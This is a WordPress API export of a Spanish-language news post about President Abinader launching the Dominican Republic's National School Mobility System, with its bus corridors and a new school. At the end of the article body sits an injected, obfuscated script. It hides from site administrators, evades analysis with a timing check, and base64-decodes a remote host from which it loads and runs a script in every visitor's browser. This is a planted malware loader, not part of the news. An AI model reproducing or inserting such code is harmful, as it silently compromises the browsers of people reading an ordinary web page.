{"id":13208,"date":"2023-01-10T15:23:31","date_gmt":"2023-01-10T19:23:31","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13208"},"modified":"2023-01-10T15:23:31","modified_gmt":"2023-01-10T19:23:31","slug":"abinader-deja-iniciado-sistema-nacional-de-movilidad-escolar","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13208","title":{"rendered":"Abinader deja iniciado Sistema Nacional de Movilidad Escolar"},"content":{"rendered":"<p>La Victoria.-\u00a0<strong>El Presidente Luis Abinader<\/strong>\u00a0dej\u00f3 iniciado este martes el\u00a0<strong>Sistema Nacional de Movilidad Escolar<\/strong>, el cual tiene como objetivo garantizar la\u00a0<strong>seguridad y el bienestar de cada estudiante del sistema educativo p\u00fablico<\/strong>, elevando la calidad de la educaci\u00f3n dominicana.<\/p>\n<p>Antes de llegar a la\u00a0<strong>Escuela Primaria Mar\u00eda Figueroa Ad\u00f3n<\/strong>, ubicada en la carretera Sabana Perdida-La Victoria, en el municipio La Victoria, el\u00a0<strong>Presidente Abinader realiz\u00f3 un recorrido en uno de los autobuses junto a los estudiantes del centro educativo.<\/strong><\/p>\n<p>El jefe de Estado resalt\u00f3 el impacto que tendr\u00e1 el Plan de Movilidad Escolar y explic\u00f3 que as\u00ed se est\u00e1 garantizando\u00a0<strong>mayor asistencia, mayor seguridad en el camino y menos gastos de la familia dominicana en transporte.\u00a0<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/FB15DF1D-D4EC-4396-B9AF-B5FB403FEC50.jpg\" alt=\"\" width=\"1600\" height=\"1066\" data-entity-type=\"file\" data-entity-uuid=\"527e0ce7-032d-4655-b96c-1b7c8204c588\" \/><\/p>\n<p>\u00ab<em>Cuando una acci\u00f3n de pol\u00edticas p\u00fablicas impacta en m\u00e1s de un sector, podemos decir que es un \u00e9xito\u00bb,<\/em>\u00a0destac\u00f3 el Presidente Abinader.<\/p>\n<p>El mandatario explic\u00f3 que lleva varios a\u00f1os analizando la movilidad escolar y de c\u00f3mo podr\u00eda impactar en la econom\u00eda y calidad de vida del pueblo dominicano.<\/p>\n<p>Asimismo, reiter\u00f3 su reconocimiento a todas las instituciones envueltas en el Plan de Movilidad Escolar.<\/p>\n<p>El gobernante exhort\u00f3\u00a0<strong>a los ni\u00f1os, maestros y personal del Ministerio de Educaci\u00f3n a cuidar de los autobuses<\/strong>, los cuales son inmuebles del pueblo dominicano.<\/p>\n<p><em>\u00abSi los cuidamos podemos dedicar m\u00e1s recursos a resolver m\u00e1s problemas\u00bb,<\/em>\u00a0indic\u00f3 el Presidente Abinader.<\/p>\n<p>Este Plan de Movilidad Escolar prestar\u00e1 servicio a una\u00a0<strong>poblaci\u00f3n estudiantil superior a 2.0 millones de estudiantes de las 18 Regiones del Ministerio de Educaci\u00f3n y sus 122 Distritos Escolares<\/strong>, como apoyo a las familias que no pueden seguir asumiendo los riesgos y altos costos del transporte de sus hijos a los centros educativos, lo que a su vez se traducir\u00e1 en un\u00a0<strong>ahorro en la econom\u00eda familiar<\/strong>.<\/p>\n<p>De su lado, el\u00a0<strong>Ministro de Educaci\u00f3n, \u00c1ngel Hern\u00e1ndez, valor\u00f3 la iniciativa<\/strong>\u00a0tomada por el Presidente Abinader y catalog\u00f3 el programa de gran car\u00e1cter en la sociedad.<\/p>\n<p>Hern\u00e1ndez destac\u00f3 que el Gobierno dominicano\u00a0<strong>construir\u00e1 mil m\u00f3dulos<\/strong>\u00a0a nivel nacional con los est\u00e1ndares de\u00a0<strong>nivel b\u00e1sico e inicial<\/strong>, en beneficio de los ni\u00f1os de tres a cinco a\u00f1os.<\/p>\n<p>Asimismo, el\u00a0<strong>Ministro de Obras P\u00fablicas, Deligne Ascensi\u00f3n,<\/strong>\u00a0encargado de la construcci\u00f3n de la Escuela Primaria Mar\u00eda Figueroa Ad\u00f3n, inform\u00f3 que la inversi\u00f3n para la construcci\u00f3n del centro educativo inaugurado en el acto tuvo una inversi\u00f3n de\u00a0<strong>132 millones de pesos<\/strong>, la cual se hizo en coordinaci\u00f3n con el Ministerio de Educaci\u00f3n.<\/p>\n<p>El funcionario apunt\u00f3 que el centro de estudio cuenta con\u00a0<strong>27 aulas, de las cuales 24 ser\u00e1n para educaci\u00f3n b\u00e1sica y 3 para el nivel inicial,<\/strong>\u00a0e impactar\u00e1 a m\u00e1s de mil estudiantes de la zona.<\/p>\n<p>De su parte<strong>, el director ejecutivo del Instituto Nacional de Tr\u00e1nsito y Transporte Terrestre<\/strong>\u00a0(<strong>INTRANT), Hugo Beras<\/strong>, indic\u00f3 que la instituci\u00f3n ha venido trabajando en la identificaci\u00f3n de las escuelas y las comunidades donde residen los estudiantes.<\/p>\n<p><em>\u00abTodo esto para que los padres puedan tener un acceso directo y exacto de c\u00f3mo, d\u00f3nde y cu\u00e1ndo se est\u00e1 movilizando a sus hijos\u00bb,<\/em>\u00a0agreg\u00f3.<\/p>\n<p>El director del INTRANT explic\u00f3 que el Gobierno de la Rep\u00fablica Dominicana\u00a0<strong>tiene preparado un pensum que permite capacitar a cada uno de\u00a0los conductores, as\u00ed como de sus asistentes,<\/strong>\u00a0antes dar servicio en una de estas unidades.<\/p>\n<p>Mientras que\u00a0<strong>el director del Instituto Nacional de Tr\u00e1nsito, (OMSA), Radham\u00e9s Gonz\u00e1lez<\/strong>, resalt\u00f3 el trabajo realizado por la instituci\u00f3n para la\u00a0<strong>distribuci\u00f3n en las diferentes provincias de un total de 50 autobuses\u00a0<\/strong>totalmente equipados con los est\u00e1ndares establecidos.<\/p>\n<p>Las palabras de bienvenida estuvieron a cargo de\u00a0<strong>la<\/strong>\u00a0<strong>directora del Centro Educativo inaugurado, Juana Henr\u00edquez<\/strong>, quien valor\u00f3 la puesta en marcha del Plan Piloto de Movilidad Escolar porque ser\u00e1 de beneficio para los estudiantes y padres de estos.<\/p>\n<p>Agreg\u00f3, que este plan se ver\u00e1 reflejado en la parte econ\u00f3mica y tendr\u00e1n la seguridad garantizada al llegar a recibir el pan de la ense\u00f1anza.<\/p>\n<p>En representaci\u00f3n de los estudiantes, Miguel \u00c1ngel Hern\u00e1ndez dio las gracias al Presidente Abinader por la puesta en marcha del Plan Piloto de Movilidad Escolar, el cual les ser\u00e1 de beneficio para su movilidad y llegar a tiempo para recibir las clases.<\/p>\n<p>El Gobierno, mediante el\u00a0<strong>Decreto\u00a0<a href=\"https:\/\/presidencia.gob.do\/decretos\/616-22\">616-22<\/a><\/strong>, declar\u00f3 de alto inter\u00e9s nacional la implementaci\u00f3n del Sistema Nacional de Movilidad Escolar, con el objetivo de\u00a0<strong>garantizar la seguridad del transporte<\/strong>\u00a0de ni\u00f1os y ni\u00f1as que se desplazan a los centros escolares,\u00a0<strong>evitando accidentes de tr\u00e1nsito que ponen en riesgo la vida de los estudiantes.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Sistema de Movilidad Escolar<\/strong><\/p>\n<p>El Sistema de Movilidad Escolar, bajo la rector\u00eda del Ministerio de Educaci\u00f3n, se expandir\u00e1 por todo el pa\u00eds para beneficiar a 2 millones de estudiantes, inici\u00f3 con la Implementaci\u00f3n de un Plan Piloto que impactar\u00e1 positivamente la vida y la seguridad de los desplazamientos a las escuelas a m\u00e1s de 100 mil estudiantes de la provincia Monte Plata, de los distritos educativos de Yamas\u00e1, Monte Plata, Bayaguana, Sabana Grande de Boy\u00e1 y Peralvillo, as\u00ed como de las comunidades de La Virgen-La Victoria-Hacienda Estrella, en Santo Domingo Norte; los distritos de Haina y Nigua, en San Crist\u00f3bal, y Las Calderas, en Ban\u00ed, provincia Peravia.<\/p>\n<p>El primer Corredor Escolar inicia en la comunidad de La Virgen, atraviesa La Victoria hasta llegar a Haras Nacionales, dando cobertura al transporte de los estudiantes del Liceo Cosme Manuel Jim\u00e9nez, Escuela Mar\u00eda Figueroa Adon, Liceo Hermana Sandra Reyes, Albergue Divina Provincia, Albergue nuestra Se\u00f1ora de la Natividad, Escuela Padre Garc\u00eda, Escuela Felicita Eleuterio, Polit\u00e9cnico Marcos Evangelista Adon, Polit\u00e9cnico Juan Pablo ll, Escuela Villa Primavera, Escuela Primavera, Escuela Los Castillo, Escuela Alberto Monegro, Escuela Hacienda Estrella, Escuela El Rosario, Liceo Manuel Enrique Pe\u00f1a, Escuela C\u00e1ndido Clase y finaliza en la Escuela Carmen Celia Balaguer, en Hacienda Estrella.<\/p>\n<p>Simult\u00e1neamente entraron en operaci\u00f3n los primeros 13 Corredores Escolares en Monte Plata con 18 autobuses, mientras que en Haina se abrieron 4 corredores con una primera asignaci\u00f3n de 4 autobuses.<\/p>\n<p>En Nigua entraron en operaci\u00f3n 6 Corredores, que ser\u00e1n servidos por 5 Autobuses y fue asignado un autob\u00fas al municipio de Las Calderas, en Ban\u00ed, para el transporte de sus estudiantes a los Liceos Fe y Alegr\u00eda, Ernestina Tejeda y Carlos Julio Tejeda, solicitado por la Junta de Vecinos de la comunidad.<\/p>\n<p>Cada estudiante dispondr\u00e1 de una Tarjeta Inteligente Bono Transporte Estudiantil, con su fotograf\u00eda, para usarlas en el Metro y el Telef\u00e9rico y corredores de la Oficina Metropolitana de Autobuses (OMSA).<\/p>\n<p>Asistieron al acto, el senador por la provincia Santo Domingo, Antonio Taveras, el director del IAD, Guillermo Garc\u00eda y la gobernadora de la provincia de Santo Domingo, Julia Drullard.<\/p>\n<p>Tambi\u00e9n las diputadas, Betty Ger\u00f3nimo y Lucrecia Leyba; la directora regional, Teodosia Ota\u00f1ez y el alcalde de La Victoria, Miguel Savi\u00f1on.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La Victoria.-\u00a0El Presidente Luis Abinader\u00a0dej\u00f3 iniciado este martes el\u00a0Sistema Nacional de Movilidad Escolar, el cual tiene como objetivo garantizar la\u00a0seguridad y el bienestar de cada estudiante del sistema educativo p\u00fablico, elevando la calidad de la educaci\u00f3n dominicana. Antes de llegar a la\u00a0Escuela Primaria Mar\u00eda Figueroa Ad\u00f3n, ubicada en la carretera Sabana Perdida-La Victoria, en el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13210,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13208","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13208"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13208\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13210"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}